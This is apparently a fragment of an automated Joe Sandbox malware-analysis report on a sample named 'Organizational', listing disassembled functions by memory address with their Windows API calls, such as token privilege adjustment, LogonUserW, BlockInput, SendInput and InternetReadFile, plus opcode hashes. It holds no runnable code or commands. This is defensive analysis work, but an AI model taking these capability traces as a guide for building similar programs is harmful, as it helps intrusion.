                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                    • String ID:
                                                    • API String ID: 292994002-0
                                                    • Opcode ID: 129245520c99a01a5f1b9c4840f9ea55ae3d87dbbbe1e158a393b2e564467c3b
                                                    • Instruction ID: 06d3b13c8b6ef36f02c5603a234bef1378f2d2d6b76ce81587a4f03db76a952a
                                                    • Opcode Fuzzy Hash: 129245520c99a01a5f1b9c4840f9ea55ae3d87dbbbe1e158a393b2e564467c3b
                                                    • Instruction Fuzzy Hash: 25110872700A159FF7111F269C84A7E7BA8EF84B30B44813AF909D7241DFB4D9019BA1
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: LocalTime__swprintf
                                                    • String ID: %.3d$WIN_XPe
                                                    • API String ID: 2070861257-2409531811
                                                    • Opcode ID: 4293ea8fc6b1d44deca757e9cde963f3f4844b230f5efc8e1b32f5ed27f17560
                                                    • Instruction ID: 373c6dc5de59c5a3e6e7ee6e950d495b5c75937388c8ead47f675676c8950161
                                                    • Opcode Fuzzy Hash: 4293ea8fc6b1d44deca757e9cde963f3f4844b230f5efc8e1b32f5ed27f17560
                                                    • Instruction Fuzzy Hash: 29D012F3858108EAC74C9B90CC54FFA777CAB04320F100053F546A2040DA358788BB26
                                                    APIs
                                                    • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00F61ED6,00000000), ref: 00F62AAD
                                                    • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00F62AE4
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Internet$AvailableDataFileQueryRead
                                                    • String ID:
                                                    • API String ID: 599397726-0
                                                    • Opcode ID: f88360e3edc585e28ae6fef8c6369399d4eb2aa794e442ec9a2247c283a8d5f0
                                                    • Instruction ID: a6fba75b90dee4d14aa351b91984d4e691f905aba7b1dde01bc4d8e565b140e0
                                                    • Opcode Fuzzy Hash: f88360e3edc585e28ae6fef8c6369399d4eb2aa794e442ec9a2247c283a8d5f0
                                                    • Instruction Fuzzy Hash: FA41A772A00A09BFEB60DE94CC85FBB77BCEB80764F10405AF605A6141DAB59E41B760
                                                    APIs
                                                      • Part of subcall function 00F10FE6: std::exception::exception.LIBCMT ref: 00F1101C
                                                      • Part of subcall function 00F10FE6: __CxxThrowException@8.LIBCMT ref: 00F11031
                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00F493E3
                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00F49410
                                                    • GetLastError.KERNEL32 ref: 00F4941D
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                    • String ID:
                                                    • API String ID: 1922334811-0
                                                    • Opcode ID: 764404b24d618deadfbe37b058fb659d6bfe972fe4434bd89cc09eb7b3a896e3
                                                    • Instruction ID: 52d752b71e36f70c1b4496909bf4d015ed088cf3becd03388929acab788cf663
                                                    • Opcode Fuzzy Hash: 764404b24d618deadfbe37b058fb659d6bfe972fe4434bd89cc09eb7b3a896e3
                                                    • Instruction Fuzzy Hash: 1A1191B2918209AFD728DF54DC86D7BBBBCFB48710B21852EF45993250EB70AC41DB60
                                                    APIs
                                                    • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00F542FF
                                                    • DeviceIoControl.KERNEL32(00000000,002D1400,00000007,0000000C,?,0000000C,?,00000000), ref: 00F5433C
                                                    • CloseHandle.KERNEL32(00000000,?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00F54345
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: CloseControlCreateDeviceFileHandle
                                                    • String ID:
                                                    • API String ID: 33631002-0
                                                    • Opcode ID: 3aef9786f17a9eaf278cb018d653ab22b61043774a18faafe7893dd46e1b5e58
                                                    • Instruction ID: 7bb5109e1ea068e23f43e10dcfeb3f3f7cf607c69c58123ae908b85079d1e77b
                                                    • Opcode Fuzzy Hash: 3aef9786f17a9eaf278cb018d653ab22b61043774a18faafe7893dd46e1b5e58
                                                    • Instruction Fuzzy Hash: 121173B2D00229BAE7109BA89C44FFEB7ACEB08725F100156BE14E7190C274594497A1
                                                    APIs
                                                    • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00F54F45
                                                    • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00F54F5C
                                                    • FreeSid.ADVAPI32(?), ref: 00F54F6C
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: AllocateCheckFreeInitializeMembershipToken
                                                    • String ID:
                                                    • API String ID: 3429775523-0
                                                    • Opcode ID: 5af34c3ce8e29f07378f974e08dc43b16e4580d8ad693692a75e8bf12a8eed75
                                                    • Instruction ID: 045990ead92e203c1f554c2391c661d6077900827848aac816c4d8b6bdfbb646
                                                    • Opcode Fuzzy Hash: 5af34c3ce8e29f07378f974e08dc43b16e4580d8ad693692a75e8bf12a8eed75
                                                    • Instruction Fuzzy Hash: 8CF04975A1130CBFDF00DFE4DC89AFEBBBCEF08211F4044A9AA01E2580E7346A489B50
                                                    APIs
                                                    • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00F51B01
                                                    • keybd_event.USER32(?,7694C0D0,?,00000000), ref: 00F51B14
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: InputSendkeybd_event
                                                    • String ID:
                                                    • API String ID: 3536248340-0
                                                    • Opcode ID: 47a4d956b098c71c4cfc69a920ed0a3a167cced5602ccea1a8d45e7dc672519f
                                                    • Instruction ID: 70f602b16aae6142c537a12c625b653ab8363381a408a6a8e0918b9f2946a042
                                                    • Opcode Fuzzy Hash: 47a4d956b098c71c4cfc69a920ed0a3a167cced5602ccea1a8d45e7dc672519f
                                                    • Instruction Fuzzy Hash: 37F0497190020DABDB00CF94C805BFE7BB4FF04316F40804AFD559A292D7799619EFA4
                                                    APIs
                                                    • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,00F69B52,?,00F8098C,?), ref: 00F5A6DA
                                                    • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,?,?,00F69B52,?,00F8098C,?), ref: 00F5A6EC
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: ErrorFormatLastMessage
                                                    • String ID:
                                                    • API String ID: 3479602957-0
                                                    • Opcode ID: 23e7800d53fc91330be38007125ec0c4385677b0915df9836a3e5d52dbcd53a1
                                                    • Instruction ID: e04e667167dccd0ae650d5fe115820292d05fde78fd7dcc4912c4848b83b386e
                                                    • Opcode Fuzzy Hash: 23e7800d53fc91330be38007125ec0c4385677b0915df9836a3e5d52dbcd53a1
                                                    • Instruction Fuzzy Hash: 01F0A73650422DBBDB20AFA4DC48FEB776CFF09361F008255B908D6191DA709954EBE1
                                                    APIs
                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00F48F27), ref: 00F48DFE
                                                    • CloseHandle.KERNEL32(?,?,00F48F27), ref: 00F48E10
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: AdjustCloseHandlePrivilegesToken
                                                    • String ID:
                                                    • API String ID: 81990902-0
                                                    • Opcode ID: 4ca07cc68fd11e1de3e37aca01059eda5e33514dc110630a277173d9724012ac
                                                    • Instruction ID: 16b6e6016b49dc184ee42d13a7071ba7cb93dcf25249e0ecf4ff47856c00af65
                                                    • Opcode Fuzzy Hash: 4ca07cc68fd11e1de3e37aca01059eda5e33514dc110630a277173d9724012ac
                                                    • Instruction Fuzzy Hash: B1E0E675410610EFE7652B50EC09DB77BADFF04350714891DF55580470DB619CD0EB50
                                                    APIs
                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00F18F87,?,?,?,00000001), ref: 00F1A38A
                                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00F1A393
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: ExceptionFilterUnhandled
                                                    • String ID:
                                                    • API String ID: 3192549508-0
                                                    • Opcode ID: 41f1cf2f590d55c55e1fa351f1b8d9cf5959bb697da713cffab27f67dd4beba8
                                                    • Instruction ID: 81e6ce72844770f73cfdbb6fd31ff8d23982632f73fab380b2bb5f27655c659e
                                                    • Opcode Fuzzy Hash: 41f1cf2f590d55c55e1fa351f1b8d9cf5959bb697da713cffab27f67dd4beba8
                                                    • Instruction Fuzzy Hash: ADB0923106430CABCA802B91EC0DBE83F68EB46A62F804010F60D44060CF625454AB91
                                                    APIs
                                                    • BlockInput.USER32(00000001), ref: 00F645F0
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: BlockInput
                                                    • String ID:
                                                    • API String ID: 3456056419-0
                                                    • Opcode ID: 8eaa140c34e5de8967aa514d55cb54a8ec68fb8892b06aaa0fd3d188d94a5463
                                                    • Instruction ID: f14e5162d0b5393f7ceec4c5d06156b02e24f3a1ed654612635868fe5b5deeb0
                                                    • Opcode Fuzzy Hash: 8eaa140c34e5de8967aa514d55cb54a8ec68fb8892b06aaa0fd3d188d94a5463
                                                    • Instruction Fuzzy Hash: C9E09A322002099FC300AF59E800AAAB7E8AF94760B048426FE0AD7351DE70BC008B90
                                                    APIs
                                                    • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 00F55205
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: mouse_event
                                                    • String ID:
                                                    • API String ID: 2434400541-0
                                                    • Opcode ID: b3face72ba18ae46e7f59e46f7a2020840a26a4a6a427ce0a83f3f42afb6ff13
                                                    • Instruction ID: 133ba2492a3bd50e268c5875f448254e3fc6ea9223f0c07b6bc070e04c7d5681
                                                    • Opcode Fuzzy Hash: b3face72ba18ae46e7f59e46f7a2020840a26a4a6a427ce0a83f3f42afb6ff13
                                                    • Instruction Fuzzy Hash: 68D09EA5560E0979ED5807249E3FF761E08EB01FD3FD445497B42890C1EDD4D84DB5B1
                                                    APIs
                                                    • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00F48FA7), ref: 00F49389
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: LogonUser
                                                    • String ID:
                                                    • API String ID: 1244722697-0
                                                    • Opcode ID: e9ecde1b4bdfed0c36425d1951256f5045ec154b1f3b312ae83d85c89830be63
                                                    • Instruction ID: 036cdc6199a8937748baba22a9bec8f8651b4019a61c74468212ad4371726165
                                                    • Opcode Fuzzy Hash: e9ecde1b4bdfed0c36425d1951256f5045ec154b1f3b312ae83d85c89830be63
                                                    • Instruction Fuzzy Hash: 82D05E3326050EABEF018EA4DC01EFE3B69EB04B01F808111FE15D50A0C775D835AB60
                                                    APIs
                                                    • GetUserNameW.ADVAPI32(?,?), ref: 00F30734
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: NameUser
                                                    • String ID:
                                                    • API String ID: 2645101109-0
                                                    • Opcode ID: 9485a976e2b6d6bdb25867caaa8bcac252c192e5d37c0884fd2680b2359a9e4d
                                                    • Instruction ID: 4469263ab9553f62526da37a4a28b3dd4fa47e260a25d5410225270674f9f560
                                                    • Opcode Fuzzy Hash: 9485a976e2b6d6bdb25867caaa8bcac252c192e5d37c0884fd2680b2359a9e4d
                                                    • Instruction Fuzzy Hash: D7C04CF280010DDBCB05DBA0D998EFF77BCAB04314F100056A105B2110DB749B449B71
                                                    APIs
                                                    • SetUnhandledExceptionFilter.KERNEL32(?), ref: 00F1A35A
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: ExceptionFilterUnhandled
                                                    • String ID:
                                                    • API String ID: 3192549508-0
                                                    • Opcode ID: 3c3bc44b683b492b98b70dba1a0252f682c496cc1a11b74c7181ec7cf59a42c1
                                                    • Instruction ID: e5acb606fa27592de41527aaf53a9a71027b3fa3ac8dc031e9ada9263c7e0090
                                                    • Opcode Fuzzy Hash: 3c3bc44b683b492b98b70dba1a0252f682c496cc1a11b74c7181ec7cf59a42c1
                                                    • Instruction Fuzzy Hash: 54A0113002020CAB8A002B82EC088A8BFACEA022A0B808020F80C000228B32A820AA80
                                                    APIs
                                                    • CharUpperBuffW.USER32(?,?,00F80980), ref: 00F73C65
                                                    • IsWindowVisible.USER32(?), ref: 00F73C89
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: BuffCharUpperVisibleWindow
                                                    • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                    • API String ID: 4105515805-45149045
                                                    • Opcode ID: 73bd24b54c979a01708d5c64b206f2a3872a3d4a2ce39cade01c004e3970361f
                                                    • Instruction ID: dbdd7924a2748c04f941d7778c7a7489d6494a60ce3afdda9d52ab8b07ca5f4a
                                                    • Opcode Fuzzy Hash: 73bd24b54c979a01708d5c64b206f2a3872a3d4a2ce39cade01c004e3970361f
                                                    • Instruction Fuzzy Hash: 3CD1A170204205DBCB14EF10C851AAEBBE1AF95354F108459F95A5B2E3CF75EE4AFB82
                                                    APIs
                                                    • SetTextColor.GDI32(?,00000000), ref: 00F7AC55
                                                    • GetSysColorBrush.USER32(0000000F), ref: 00F7AC86
                                                    • GetSysColor.USER32(0000000F), ref: 00F7AC92
                                                    • SetBkColor.GDI32(?,000000FF), ref: 00F7ACAC
                                                    • SelectObject.GDI32(?,?), ref: 00F7ACBB
                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 00F7ACE6
                                                    • GetSysColor.USER32(00000010), ref: 00F7ACEE
                                                    • CreateSolidBrush.GDI32(00000000), ref: 00F7ACF5
                                                    • FrameRect.USER32(?,?,00000000), ref: 00F7AD04
                                                    • DeleteObject.GDI32(00000000), ref: 00F7AD0B
                                                    • InflateRect.USER32(?,000000FE,000000FE), ref: 00F7AD56
                                                    • FillRect.USER32(?,?,?), ref: 00F7AD88
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00F7ADB3
                                                      • Part of subcall function 00F7AF18: GetSysColor.USER32(00000012), ref: 00F7AF51
                                                      • Part of subcall function 00F7AF18: SetTextColor.GDI32(?,?), ref: 00F7AF55
                                                      • Part of subcall function 00F7AF18: GetSysColorBrush.USER32(0000000F), ref: 00F7AF6B
                                                      • Part of subcall function 00F7AF18: GetSysColor.USER32(0000000F), ref: 00F7AF76
                                                      • Part of subcall function 00F7AF18: GetSysColor.USER32(00000011), ref: 00F7AF93
                                                      • Part of subcall function 00F7AF18: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00F7AFA1
                                                      • Part of subcall function 00F7AF18: SelectObject.GDI32(?,00000000), ref: 00F7AFB2
                                                      • Part of subcall function 00F7AF18: SetBkColor.GDI32(?,00000000), ref: 00F7AFBB
                                                      • Part of subcall function 00F7AF18: SelectObject.GDI32(?,?), ref: 00F7AFC8
                                                      • Part of subcall function 00F7AF18: InflateRect.USER32(?,000000FF,000000FF), ref: 00F7AFE7
                                                      • Part of subcall function 00F7AF18: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00F7AFFE
                                                      • Part of subcall function 00F7AF18: GetWindowLongW.USER32(00000000,000000F0), ref: 00F7B013
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                    • String ID:
                                                    • API String ID: 4124339563-0
                                                    • Opcode ID: 303d126beee475d2b40e222042536e705cb7077af3a05917908440e2f5dd724b
                                                    • Instruction ID: e3ceaa77f535f148c0488bcaa5060e3a4450076d431cf0768b8c6f582dd6f5d6
